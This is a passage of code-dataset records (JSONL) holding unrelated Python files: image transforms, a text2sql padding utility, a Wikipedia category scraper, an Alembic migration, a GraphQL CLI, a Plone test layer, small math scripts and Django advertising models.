(ndarray): of shape HxW, HxWxC, or NxHxWxC. The array can be\n of type uint8 in range [0, 255], or floating point in range\n [0, 1] or [0, 255].\n\n Returns:\n ndarray: the cropped image(s).\n \"\"\"\n oh, ow = img.shape[:2]\n\n swidth, sheight = self.output_size\n\n src_rect = [self.pleft, self.ptop, swidth + self.pleft,\n sheight + self.ptop] # x1,y1,x2,y2\n img_rect = [0, 0, ow, oh]\n # rect intersection\n new_src_rect = [max(src_rect[0], img_rect[0]),\n max(src_rect[1], img_rect[1]),\n min(src_rect[2], img_rect[2]),\n min(src_rect[3], img_rect[3])]\n dst_rect = [max(0, -self.pleft),\n max(0, -self.ptop),\n max(0, -self.pleft) + new_src_rect[2] - new_src_rect[0],\n max(0, -self.ptop) + new_src_rect[3] - new_src_rect[1]]\n\n # crop the image\n cropped = np.zeros([sheight, swidth, 3], dtype=img.dtype)\n cropped[:, :, ] = np.mean(img, axis=(0, 1))\n cropped[dst_rect[1]:dst_rect[3], dst_rect[0]:dst_rect[2]] = \\\n img[new_src_rect[1]:new_src_rect[3],\n new_src_rect[0]:new_src_rect[2]]\n return cropped\n\n def apply_coords(self, coords: np.ndarray) -> np.ndarray:\n \"\"\"\n Crop the coordinates.\n\n Args:\n coords (ndarray): floating point array of shape Nx2. Each row is\n (x, y).\n Returns:\n ndarray: the flipped coordinates.\n\n Note:\n The inputs are floating point coordinates, not pixel indices.\n Therefore they are flipped by `(W - x, H - y)`, not\n `(W - 1 - x, H 1 - y)`.\n \"\"\"\n coords_offset = np.array([self.pleft, self.ptop], dtype=np.float32)\n coords = coords - coords_offset\n swidth, sheight = self.output_size\n coords[..., 0] = np.clip(coords[..., 0], 0, swidth - 1)\n coords[..., 1] = np.clip(coords[..., 1], 0, sheight - 1)\n return coords\n\n def apply_meta_infos(self, meta_infos: dict) -> dict:\n meta_infos[\"jitter_pad_left\"] = self.pleft\n meta_infos[\"jitter_pad_right\"] = self.pright\n meta_infos[\"jitter_pad_top\"] = self.ptop\n meta_infos[\"jitter_pad_bot\"] = self.pbot\n meta_infos[\"jitter_swidth\"] = self.output_size[0]\n meta_infos[\"jitter_sheight\"] = self.output_size[1]\n return meta_infos\n\n\nclass DistortTransform2(Transform):\n \"\"\"\n Distort image w.r.t hue, saturation and exposure.\n \"\"\"\n\n def __init__(self, hue, saturation, exposure):\n super().__init__()\n self._set_attributes(locals())\n\n def apply_image(self, img: np.ndarray) -> np.ndarray:\n \"\"\"\n Args:\n img (ndarray): of shape HxW, HxWxC, or NxHxWxC. The array can be\n of type uint8 in range [0, 255], or floating point in range\n [0, 1] or [0, 255].\n\n Returns:\n ndarray: the distorted image(s).\n \"\"\"\n dhue = np.random.uniform(low=-self.hue, high=self.hue)\n dsat = self._rand_scale(self.saturation)\n dexp = self._rand_scale(self.exposure)\n\n img = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)\n img = np.asarray(img, dtype=np.float32) / 255.\n img[:, :, 1] *= dsat\n img[:, :, 2] *= dexp\n H = img[:, :, 0] + dhue * 179 / 255.\n\n if dhue > 0:\n H[H > 1.0] -= 1.0\n else:\n H[H < 0.0] += 1.0\n\n img[:, :, 0] = H\n img = (img * 255).clip(0, 255).astype(np.uint8)\n img = cv2.cvtColor(img, cv2.COLOR_HSV2RGB)\n img = np.asarray(img, dtype=np.float32)\n\n return img\n\n def apply_coords(self, coords: np.ndarray) -> np.ndarray:\n return coords\n\n def _rand_scale(self, upper_bound):\n \"\"\"\n Calculate random scaling factor.\n\n Args:\n upper_bound (float): range of the random scale.\n Returns:\n random scaling factor (float) whose range is\n from 1 / s to s .\n \"\"\"\n scale = np.random.uniform(low=1, high=upper_bound)\n if np.random.rand() > 0.5:\n return scale\n return 1 / scale\n\n\nclass HFlipTransform(Transform):\n \"\"\"\n Perform horizontal flip.\n \"\"\"\n\n def __init__(self, width: int):\n super().__init__()\n self._set_attributes(locals())\n\n def apply_image(self, img: np.ndarray) -> np.ndarray:\n \"\"\"\n Flip the image(s).\n\n Args:\n img (ndarray): of shape HxW, HxWxC, or NxHxWxC. The array can be\n of type uint8 in range [0, 255], or floating point in range\n [0, 1] or [0, 255].\n\n Returns:\n ndarray: the flipped image(s).\n \"\"\"\n tensor = torch.from_numpy(np.ascontiguousarray(img).copy())\n if len(tensor.shape) == 2:\n # For dimension of HxW.\n tensor = tensor.flip((-1))\n elif len(tensor.shape) > 2:\n # For dimension of HxWxC, NxHxWxC.\n tensor = tensor.flip((-2))\n return tensor.numpy()\n\n def apply_coords(self, coords: np.ndarray) -> np.ndarray:\n \"\"\"\n Flip the coordinates.\n\n Args:\n coords (ndarray): floating point array of shape Nx2. Each row is (x, y).\n\n Returns:\n ndarray: the flipped coordinates.\n\n Note:\n The inputs are floating point coordinates, not pixel indices.\n Therefore they are flipped by `(W - x, H - y)`, not\n `(W - 1 - x, H 1 - y)`.\n \"\"\"\n coords[:, 0] = self.width - coords[:, 0]\n return coords\n\n def apply_meta_infos(self, meta_infos: dict) -> dict:\n pleft = meta_infos[\"jitter_pad_left\"]\n pright = meta_infos[\"jitter_pad_right\"]\n pleft, pright = pright, pleft\n meta_infos[\"jitter_pad_left\"] = pleft\n meta_infos[\"jitter_pad_right\"] = pright\n return meta_infos\n\n\nclass VFlipTransform(Transform):\n \"\"\"\n Perform vertical flip.\n \"\"\"\n\n def __init__(self, height: int):\n super().__init__()\n self._set_attributes(locals())\n\n def apply_image(self, img: np.ndarray) -> np.ndarray:\n \"\"\"\n Flip the image(s).\n\n Args:\n img (ndarray): of shape HxW, HxWxC, or NxHxWxC. The array can be\n of type uint8 in range [0, 255], or floating point in range\n [0, 1] or [0, 255].\n\n Returns:\n ndarray: the flipped image(s).\n \"\"\"\n tensor = torch.from_numpy(np.ascontiguousarray(img).copy())\n if len(tensor.shape) == 2:\n # For dimension of HxW.\n tensor = tensor.flip((-2))\n elif len(tensor.shape) > 2:\n # For dimension of HxWxC, NxHxWxC.\n tensor = tensor.flip((-3))\n return tensor.numpy()\n\n def apply_coords(self, coords: np.ndarray) -> np.ndarray:\n \"\"\"\n Flip the coordinates.\n\n Args:\n coords (ndarray): floating point array of shape Nx2. Each row is (x, y).\n\n Returns:\n ndarray: the flipped coordinates.\n\n Note:\n The inputs are floating point coordinates, not pixel indices.\n Therefore they are flipped by `(W - x, H - y)`, not\n `(W - 1 - x, H - 1 - y)`.\n \"\"\"\n coords[:, 1] = self.height - coords[:, 1]\n return coords\n\n\nclass NoOpTransform(Transform):\n \"\"\"\n A transform that does nothing.\n \"\"\"\n\n def __init__(self):\n super().__init__()\n\n def apply_image(self, img: np.ndarray) -> np.ndarray:\n return img\n\n def apply_coords(self, coords: np.ndarray) -> np.ndarray:\n return coords\n\n\nclass ShiftTransform(Transform):\n \"\"\"\n Shift the image with random pixels.\n \"\"\"\n\n def __init__(self, shift_x: int, shift_y: int):\n \"\"\"\n Args:\n shift_x (int): the shift pixel for x axis.\n shift_y (int): the shift piexl for y axis.\n \"\"\"\n super().__init__()\n self._set_attributes(locals())\n\n def apply_image(self, img: np.ndarray) -> np.ndarray:\n \"\"\"\n Shift the image(s).\n\n Args:\n img (ndarray): of shape NxHxWxC, or HxWxC or HxW. The array can be\n of type uint8 in range [0, 255], or floating point in range\n [0, 1] or [0, 255].\n\n Returns:\n ndarray: shifted image(s).\n \"\"\"\n new_img = np.zeros_like(img)\n if self.shift_x < 0:\n new_x = 0\n orig_x = - self.shift_x\n else:\n new_x = self.shift_x\n orig_x = 0\n if self.shift_y < 0:\n new_y = 0\n orig_y = - self.shift_y\n else:\n new_y = self.shift_y\n orig_y = 0\n\n if len(img.shape) <= 3:\n img_h, img_w = img.shape[:2]\n new_h = img_h - np.abs(self.shift_y)\n new_w = img_w - np.abs(self.shift_x)\n new_img[new_y:new_y + new_h, new_x:new_x + new_w] = img[\n orig_y:orig_y + new_h,\n orig_x:orig_x + new_w]\n return new_img\n else:\n img_h, img_w = img.shape[1:3]\n new_h = img_h - np.abs(self.shift_y)\n new_w = img_w - np.abs(self.shift_x)\n new_img[..., new_y:new_y + new_h, new_x:new_x + new_w, :] = img[\n ...,\n orig_y:orig_y + new_h,\n orig_x:orig_x + new_w,\n :]\n return new_img\n\n def apply_coords(self, coords: np.ndarray) -> np.ndarray:\n \"\"\"\n Apply shift transform on coordinates.\n\n Args:\n coords (ndarray): floating point array of shape Nx2. Each row is (x, y).\n\n Returns:\n ndarray: cropped coordinates.\n \"\"\"\n coords[:, 0] += self.shift_x\n coords[:, 1] += self.shift_y\n return coords\n\n\nclass ResizeTransform(Transform):\n \"\"\"\n Resize the image to a target size.\n \"\"\"\n\n def __init__(self, h, w, new_h, new_w, interp):\n \"\"\"\n Args:\n h, w (int): original image size\n new_h, new_w (int): new image size\n interp: PIL interpolation methods\n \"\"\"\n # TODO decide on PIL vs opencv\n super().__init__()\n self._set_attributes(locals())\n\n def apply_image(self, img, interp=None):\n assert img.shape[:2] == (self.h, self.w)\n pil_image = Image.fromarray(img)\n interp_method = interp if interp is not None else self.interp\n pil_image = pil_image.resize((self.new_w, self.new_h), interp_method)\n ret = np.asarray(pil_image)\n return ret\n\n def apply_coords(self, coords):\n coords[:, 0] = coords[:, 0] * (self.new_w * 1.0 / self.w)\n coords[:, 1] = coords[:, 1] * (self.new_h * 1.0 / self.h)\n return coords\n\n def apply_segmentation(self, segmentation):\n segmentation = self.apply_image(segmentation, interp=Image.NEAREST)\n return segmentation\n\n\ndef HFlip_rotated_box(transform, rotated_boxes):\n \"\"\"\n Apply the horizontal flip transform on rotated boxes.\n\n Args:\n rotated_boxes (ndarray): Nx5 floating point array of\n (x_center, y_center, width, height, angle_degrees) format\n in absolute coordinates.\n \"\"\"\n # Transform x_center\n rotated_boxes[:, 0] = transform.width - rotated_boxes[:, 0]\n # Transform angle\n rotated_boxes[:, 4] = -rotated_boxes[:, 4]\n return rotated_boxes\n\n\ndef Resize_rotated_box(transform, rotated_boxes):\n \"\"\"\n Apply the resizing transform on rotated boxes. For details of how these (approximation)\n formulas are derived, please refer to :meth:`RotatedBoxes.scale`.\n\n Args:\n rotated_boxes (ndarray): Nx5 floating point array of\n (x_center, y_center, width, height, angle_degrees) format\n in absolute coordinates.\n \"\"\"\n scale_factor_x = transform.new_w * 1.0 / transform.w\n scale_factor_y = transform.new_h * 1.0 / transform.h\n rotated_boxes[:, 0] *= scale_factor_x\n rotated_boxes[:, 1] *= scale_factor_y\n theta = rotated_boxes[:, 4] * np.pi / 180.0\n c = np.cos(theta)\n s = np.sin(theta)\n rotated_boxes[:, 2] *= np.sqrt(\n np.square(scale_factor_x * c) + np.square(scale_factor_y * s))\n rotated_boxes[:, 3] *= np.sqrt(\n np.square(scale_factor_x * s) + np.square(scale_factor_y * c))\n rotated_boxes[:, 4] = np.arctan2(scale_factor_x * s,\n scale_factor_y * c) * 180 / np.pi\n\n return rotated_boxes\n\n\nHFlipTransform.register_type(\"rotated_box\", HFlip_rotated_box)\nNoOpTransform.register_type(\"rotated_box\", lambda t, x: x)\nResizeTransform.register_type(\"rotated_box\", Resize_rotated_box)\n","sub_path":"playground/detection/coco/yolof/yolof_base/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":25318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"182670507","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"text2sql\"\"\"\n\nfrom text2sql.utils.nn_utils import PaddleFluidWrapper as fluider\n\nimport numpy as np\n\ndef pad_batch_data(insts,\n max_len=None,\n insts_data_type=\"int64\",\n shape=None,\n pad_idx=0,\n return_pos=False,\n return_input_mask=False,\n return_max_len=False,\n return_num_token=False,\n return_seq_lens=False,\n paddle_version_code=1.5):\n \"\"\"\n Pad the instances to the max sequence length in batch, and generate the\n corresponding position data and attention bias.\n \"\"\"\n return_list = []\n if max_len is None:\n max_len = max(len(inst) for inst in insts) if shape is None else shape[1]\n\n if shape is None:\n shape = [-1, max_len, 1]\n\n # id\n inst_data = np.array(\n [inst + list([pad_idx] * (max_len - len(inst))) for inst in insts])\n return_list += [inst_data.astype(insts_data_type).reshape(shape)]\n\n # position data\n if return_pos:\n inst_pos = np.array([\n list(range(0, len(inst))) + [pad_idx] * (max_len - len(inst))\n for inst in insts\n ])\n\n return_list += [inst_pos.astype(\"int64\").reshape([-1, max_len, 1])]\n\n if return_input_mask:\n # This is used to avoid attention on paddings.\n input_mask_data = np.array([[1] * len(inst) + [0] * (max_len - len(inst)) for inst in insts])\n input_mask_data = np.expand_dims(input_mask_data, axis=-1)\n return_list += [input_mask_data.astype(\"float32\")]\n\n if return_max_len:\n return_list += [max_len]\n\n if return_num_token:\n num_token = 0\n for inst in insts:\n num_token += len(inst)\n return_list += [num_token]\n\n if return_seq_lens:\n if paddle_version_code <= 1.5:\n seq_lens_type = [-1, 1]\n else:\n seq_lens_type = [-1]\n seq_lens = np.array([len(inst) for inst in insts])\n return_list += [seq_lens.astype(\"int64\").reshape(seq_lens_type)]\n\n return return_list if len(return_list) > 1 else return_list[0]\n\n\ndef fix_random_seed(seed, trainer):\n \"\"\"固定主要随机数的种子,保证实验可复现\n\n Args:\n seed (TYPE): NULL\n trainer (TYPE): NULL\n\n Returns: TODO\n\n Raises: NULL\n \"\"\"\n if args.seed is None:\n return False\n\n import random\n\n random.seed(seed)\n np.random.seed(seed)\n os.environ['FLAGS_cudnn_deterministic'] = 'True'\n return True\n\n","sub_path":"NLP/DuSQL-Baseline/text2sql/utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"379612605","text":"\"\"\"\nTask 2: В нашей школе мы не можем разглашать персональные данные\nпользователей, но чтобы преподаватель и ученик смогли объяснить нашей\nподдержке, кого они имеют в виду (у преподавателей, например, часто учится\nнесколько Саш), мы генерируем пользователям уникальные и легко произносимые\nимена. Имя у нас состоит из прилагательного, имени животного и двузначной\nцифры. В итоге получается, например, \"Перламутровый лосось 77\". Для\nгенерации таких имен мы и решали следующую задачу:\nПолучить с русской википедии список всех животных (Категория:Животные по\nалфавиту) и вывести количество животных на каждую букву алфавита. Результат\nдолжен получиться в следующем виде:\nА: 642\nБ: 412\nВ:....\n\n\"\"\"\n\nimport logging\n\nimport requests\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\nhandler = logging.StreamHandler()\nhandler.setFormatter(logging.Formatter('%(levelname)s, %(message)s'))\nlogger.addHandler(handler)\n\n\ndef create_list():\n \"\"\" creating the list of animals in Task_2.txt \"\"\"\n S = requests.Session()\n URL = 'https://ru.wikipedia.org/w/api.php'\n str_cont = ''\n list_of_names = []\n while True:\n\n PARAMS = {\n 'action': 'query',\n 'format': 'json',\n 'list': 'categorymembers',\n 'cmtitle': 'Категория:Животные_по_алфавиту',\n 'cmlimit': 500,\n 'cmcontinue': str_cont,\n }\n\n R = S.get(url=URL, params=PARAMS)\n DATA = R.json()\n if ('warnings' or 'errors') in DATA:\n logger.error(DATA['warnings'])\n\n for i in list(DATA['query']['categorymembers']):\n list_of_names.append(i['title'])\n\n if 'continue' in DATA:\n str_cont = DATA['continue']['cmcontinue']\n else:\n break\n file = open('Task_2.txt', 'w')\n file.write(str(list_of_names))\n file.close()\n\n\ndef main():\n # calling the list(.txt) creation function\n create_list()\n\n # reading the file with the list of animals\n file_r = open('Task_2.txt')\n list_names = file_r.read()\n file_r.close()\n\n logger.debug(list_names)\n logger.debug(len(list_names))\n\n # creating russian alphabet\n a = ord('а')\n before_e = [chr(i) for i in range(a, a + 6)]\n after_e = [chr(i) for i in range(a + 6, a + 32)]\n alphabet = ''.join(before_e + [chr(a + 33)] + after_e)\n\n # creating a dict with the number of animals for each letter\n letter_dict = {}\n for letter in alphabet.upper():\n counter = 0\n for i in list_names:\n if i[0] == letter:\n counter += 1\n letter_dict[letter] = counter\n\n logger.debug(letter_dict)\n\n # printing the result\n for key in letter_dict:\n print(f'{key}: {letter_dict[key]}')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Task_2.py","file_name":"Task_2.py","file_ext":"py","file_size_in_byte":3354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"70790305","text":"\"\"\"Add unique liked video index\n\nRevision ID: 6819601080a6\nRevises: 3a33f90aae7c\nCreate Date: 2020-02-13 15:14:11.782833\n\n\"\"\"\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"6819601080a6\"\ndown_revision = \"3a33f90aae7c\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_unique_constraint(\n \"unique_liked_video\",\n \"liked_videos\",\n [\"user_id\", \"video_id\"],\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(\"unique_liked_video\", \"liked_videos\", type_=\"unique\")\n # ### end Alembic commands ###\n","sub_path":"alembic/versions/6819601080a6_add_unique_liked_video_index.py","file_name":"6819601080a6_add_unique_liked_video_index.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"552625050","text":"\"\"\"List and manipulate vaults in the GraphQL server\"\"\"\n\n__copyright__ = \"\"\"\nCopyright (C) 2021 Manetu Inc.\nAuthor: Alex Tsariounov \n\nThis is free software; please see the LICENSE file\nfor details and any restrictions.\n\"\"\"\n\nfrom mql.args import vault_parser\nfrom mql.commands.schema import get_schema\nimport json, sys\n\nverbosity = 0\nschema = {}\n\ndef dispatch(gql, args, remainder):\n \"\"\"gql: an intialized GQL object, args: the parsed arguments\"\"\"\n global verbosity\n verbosity = args.verbose\n\n if args.subcmd == None:\n print('Error: vault subcommand not specified')\n vault_parser.print_usage()\n sys.exit(1)\n\n if verbosity > 1:\n print(f'executing \"vault\" command, verbosity {verbosity}')\n\n args.terms.extend(remainder) # add potentially negated terms (for search)\n\n if verbosity > 1:\n print(f\"args: {args}\")\n\n cmds = {\n 'list': vlist,\n 'search': search,\n 'create': create,\n 'delete': delete\n }\n\n if args.subcmd not in cmds:\n raise ValueError(f'unknown command requested: \"{args.subcmd}\"')\n\n data = cmds[args.subcmd](gql, args)\n\n if args.pretty:\n print(json.dumps(json.loads(data), indent=2))\n else:\n print(data)\n\n\ndef vlist(gql, args):\n if verbosity > 0:\n print('executing \"list\" subcommand')\n\n scopes = ['ALL', 'CLAIMED', 'UNCLAIMED', 'REJECTED']\n scope = None\n for tt in args.terms:\n if tt in scopes:\n scope = tt\n break\n \n spec = 'scope:ALL'\n if scope != None:\n spec = f'scope:{scope}'\n elif len(args.terms) > 0:\n spec = f'labels:{args.terms}'\n\n fields = get_vault_fields(gql, args.full, args.attributes, args.iri)\n\n query = f'{{ get_provider_vaults({spec}) {{ {\" \".join(fields)} }} }}'\n\n if verbosity > 1:\n print(f'using query text: {query}')\n\n data = gql.query(query, None)\n\n return data\n\ndef search(gql, args):\n pass\n\ndef create(gql, args):\n pass\n\ndef delete(gql, args):\n pass\n\n\ndef lookup_object(gql, name):\n global schema\n if schema == {}:\n schema = json.loads(get_schema(gql, 'all', True))['data']['__schema']\n\n obj = None\n for v in schema['types']:\n if v['name'] == name:\n obj = v\n break\n return obj\n\ndef get_vault_fields(gql, full=False, attr=False, iri=False):\n # minimal field set\n if not full:\n return ['label']\n\n # full field set\n vault = lookup_object(gql, 'vault')\n if vault == None:\n raise ValueError(\"can't find 'vault' object in schema\")\n\n flist = []\n for field in vault['fields']:\n # skip attributes for now\n if field['name'] == 'attributes':\n continue\n\n if field['type']['kind'] == 'ENUM' or field['type']['kind'] == 'SCALAR':\n flist.append(field['name'])\n continue\n\n if field['type']['kind'] == 'NON_NULL' and field['type']['ofType']['kind'] == 'SCALAR':\n flist.append(field['name'])\n\n return flist\n","sub_path":"mql/commands/vault.py","file_name":"vault.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"56457012","text":"# -*- coding: utf-8 -*-\nfrom plone.app.testing import PLONE_FIXTURE\nfrom plone.app.testing import PloneSandboxLayer\nfrom plone.app.testing import applyProfile\nfrom plone.app.testing.layers import FunctionalTesting\nfrom plone.app.testing.layers import IntegrationTesting\nfrom plone.testing import z2\n\n\nadmin = {\n 'id': 'admin',\n 'password': 'secret',\n 'roles': ['Manager'],\n}\neditor = {\n 'id': 'editor',\n 'password': 'secret',\n 'roles': ['Editor'],\n}\ncontributor = {\n 'id': 'contributor',\n 'password': 'secret',\n 'roles': ['Contributor'],\n}\nusers_to_be_added = (\n admin,\n editor,\n contributor,\n)\nusers_with_member_folder = (\n editor,\n contributor,\n)\n\n\nclass PloneAppIterateLayer(PloneSandboxLayer):\n\n defaultBases = (PLONE_FIXTURE,)\n\n def setUpZope(self, app, configurationContext):\n import Products.ATContentTypes\n self.loadZCML(package=Products.ATContentTypes)\n z2.installProduct(app, 'Products.ATContentTypes')\n\n z2.installProduct(app, 'Products.Archetypes')\n z2.installProduct(app, 'Products.ATContentTypes')\n z2.installProduct(app, 'plone.app.blob')\n z2.installProduct(app, 'plone.app.collection')\n\n import plone.app.iterate\n self.loadZCML(package=plone.app.iterate)\n z2.installProduct(app, 'plone.app.iterate')\n\n def setUpPloneSite(self, portal):\n # restore default workflow\n applyProfile(portal, 'Products.CMFPlone:testfixture')\n\n # add default content\n applyProfile(portal, 'Products.ATContentTypes:content')\n\n applyProfile(portal, 'plone.app.iterate:plone.app.iterate')\n applyProfile(portal, 'plone.app.iterate:test')\n\n for user in users_to_be_added:\n portal.portal_membership.addMember(\n user['id'],\n user['password'],\n user['roles'],\n [],\n )\n\n for user in users_with_member_folder:\n mtool = portal.portal_membership\n if not mtool.getMemberareaCreationFlag():\n mtool.setMemberareaCreationFlag()\n mtool.createMemberArea(user['id'])\n\n if mtool.getMemberareaCreationFlag():\n mtool.setMemberareaCreationFlag()\n\n portal.portal_workflow.setChainForPortalTypes(\n ('Document',),\n 'plone_workflow',\n )\n\n # Turn on versioning for folders\n portal_repository = portal.portal_repository\n portal_repository.addPolicyForContentType(\n 'Folder',\n u'at_edit_autoversion',\n )\n portal_repository.addPolicyForContentType(\n 'Folder',\n u'version_on_revert',\n )\n versionable_types = portal_repository.getVersionableContentTypes()\n versionable_types.append('Folder')\n portal_repository.setVersionableContentTypes(versionable_types)\n\n\nPLONEAPPITERATE_FIXTURE = PloneAppIterateLayer()\n\nPLONEAPPITERATE_INTEGRATION_TESTING = IntegrationTesting(\n bases=(PLONEAPPITERATE_FIXTURE,),\n name=\"PloneAppIterateLayer:Integration\")\n\nPLONEAPPITERATE_FUNCTIONAL_TESTING = FunctionalTesting(\n bases=(PLONEAPPITERATE_FIXTURE,),\n name=\"PloneAppIterateLayer:Functional\")\n","sub_path":"buildout-cache--/eggs/plone.app.iterate-3.0.1-py2.7.egg/plone/app/iterate/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"220705998","text":"from sys import stdin\n\n\nmaxi = None\nmini = None\nfor line in stdin:\n n = int(line.strip())\n if maxi is None and mini is None:\n maxi = n\n mini = n\n else:\n maxi , mini = max(maxi, n), min(mini, n)\nprint(mini, maxi)\n\n\n","sub_path":"maxmin.py","file_name":"maxmin.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"395217139","text":"# https://www.codewars.com/kata/55de8eabd9bef5205e0000ba/solutions/python/me/best_practice\n\ndef find_emirp(n):\n primes = map(str, sieve(n))\n emirps = [int(i) for i in primes if is_prime(int(i[::-1])) and is_prime(int(i)) and i != i[::-1]]\n if not len(emirps):\n return [0, 0, 0]\n return [len(emirps), max(emirps), sum(emirps)]\n \ndef sieve(limit):\n not_primes = set()\n primes = []\n for i in range(13, limit + 1, 2):\n if not i in not_primes:\n primes.append(i)\n else:\n not_primes.update(range(i, limit, i * i))\n return primes\n \ndef is_prime(n):\n for i in range(2, int(n ** 0.5) + 1):\n if n % i == 0:\n return False\n else:\n return True\n\nprint(find_emirp(10))\nprint(find_emirp(50))\nprint(find_emirp(100))\nprint(find_emirp(200))\n\n","sub_path":"findEmirps.py","file_name":"findEmirps.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"541925114","text":"import json\nimport sys\nsys.path.insert(0,'../')\nimport jwzthreading_r as th\nimport unittest\nimport os\n\nsys.path.insert(0,'../')\nfrom mboxparser import MboxParser\n\nclass Test_Mbox_Mails(unittest.TestCase):\n\n\tdef setUp(self):\n\t\ttry:\n\t\t\tos.remove('testoutput.json')\n\t\texcept OSError:\n\t\t\tpass\n\n\t\tself.mparser = MboxParser()\n\n\tdef test(self):\n\t\t\"\"\"\n\t\tThis function checks whether the count of values \n\t\tin dictionary output of jwzthreading_r.py for each\n\t\tMessage-ID is equal to the count of property ID in \n\t\ttestoutput.json file.\n\t\t\n\t\t\"\"\"\n\t\tvalue_count=0\n\t\toriginal_count=0\n\t\tmbox = self.mparser.create_json('xen-devel-2016-05', 'testoutput.json', file=True)\n\t\tmessages = th.message_details('xen-devel-2016-05', file=True)\n\t\t#print(messages.items())\n\t\tfor key,value in messages.items():\n\t\t\tvalue_count=0\n\t\t\toriginal_count = len(value)\n\t\t\twith open('testoutput.json') as f:\n\t\t\t\tfor line in f:\n\t\t\t\t\twhile True:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tjfile=json.loads(line)\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\texcept ValueError:\n\t\t\t\t\t\t\tline += next(f)\n\n\n\t\t\t\t\tif jfile['property'] == key:\n\t\t\t\t\t\tvalue_count = value_count + 1\n\n\t\t\tself.assertEquals(original_count+1,value_count,\"Equal\")\n\n\tdef tearDown(self):\n\t\tdel self.mparser\n\nif __name__ == '__main__':\n\tunittest.main()\n","sub_path":"tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"173112303","text":"from django.db import models\nfrom user_control.models import AdvertiserModel, CustomerModel\n\n\nclass AdvertiseModel(models.Model):\n # ADVERTISEMENT_TYPE_CHOICES = [\n # ('Bill Board', 'Bill Board'),\n # ('Vehicle', 'Vehicle'),\n # ]\n #\n # PRICE_RATE_TYPE_CHOICES = [\n # ('Day', 'Day'),\n # ('Month', 'Month'),\n # ]\n #\n # SIZE_SCALE_TYPE_CHOICES = [\n # ('Inches', 'Inches'),\n # ('Feet', 'Feet'),\n # ('Meter', 'Meter'),\n # ]\n\n advertiser = models.ForeignKey(AdvertiserModel, null=True, blank=True, on_delete=models.CASCADE)\n image = models.ImageField(null=True, blank=True)\n location = models.CharField(max_length=255)\n facing = models.CharField(max_length=255, null=True, blank=True)\n price = models.DecimalField(max_digits=10, decimal_places=2)\n # price_rate = models.CharField(max_length=30, choices=PRICE_RATE_TYPE_CHOICES)\n price_rate = models.CharField(max_length=30)\n height = models.DecimalField(max_digits=5, decimal_places=2)\n width = models.DecimalField(max_digits=5, decimal_places=2)\n # size_scale = models.CharField(max_length=30, choices=SIZE_SCALE_TYPE_CHOICES)\n size_scale = models.CharField(max_length=30)\n # advertisement_type = models.CharField(max_length=30, choices=ADVERTISEMENT_TYPE_CHOICES)\n advertisement_type = models.CharField(max_length=30)\n additional_note = models.TextField(null=True, blank=True)\n date_posted = models.DateTimeField(auto_now_add=True)\n is_active = models.BooleanField(default=True)\n\n def __str__(self):\n return self.location\n\n\nclass OrderModel(models.Model):\n PRICE_RATE_TYPE_CHOICES = [\n ('Day', 'Day'),\n ('Month', 'Month'),\n ]\n\n customer = models.ForeignKey(CustomerModel, null=True, blank=True, on_delete=models.CASCADE)\n advertise = models.ForeignKey(AdvertiseModel, null=True, blank=True, on_delete=models.CASCADE)\n image = models.ImageField(null=True, blank=True)\n duration = models.CharField(max_length=30)\n price_rate = models.CharField(max_length=30, choices=PRICE_RATE_TYPE_CHOICES)\n total_cost = models.DecimalField(max_digits=7, decimal_places=2, null=True, blank=True)\n additional_note = models.TextField(null=True, blank=True)\n is_approved = models.BooleanField(default=False)\n is_canceled = models.BooleanField(default=False)\n advertiser_paid_approval = models.BooleanField(default=False)\n customer_paid_approval = models.BooleanField(default=False)\n is_running = models.BooleanField(default=False)\n is_complete = models.BooleanField(default=False)\n date_created = models.DateTimeField(auto_now_add=True)\n\n\nclass OrderPaymentModel(models.Model):\n order = models.ForeignKey(OrderModel, null=True, blank=True, on_delete=models.CASCADE)\n transaction_id = models.CharField(max_length=50, null=True, blank=True)\n phone_number = models.CharField(max_length=15, null=True, blank=True)\n date_time = models.DateTimeField(auto_now_add=True)\n","sub_path":"ad_control/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
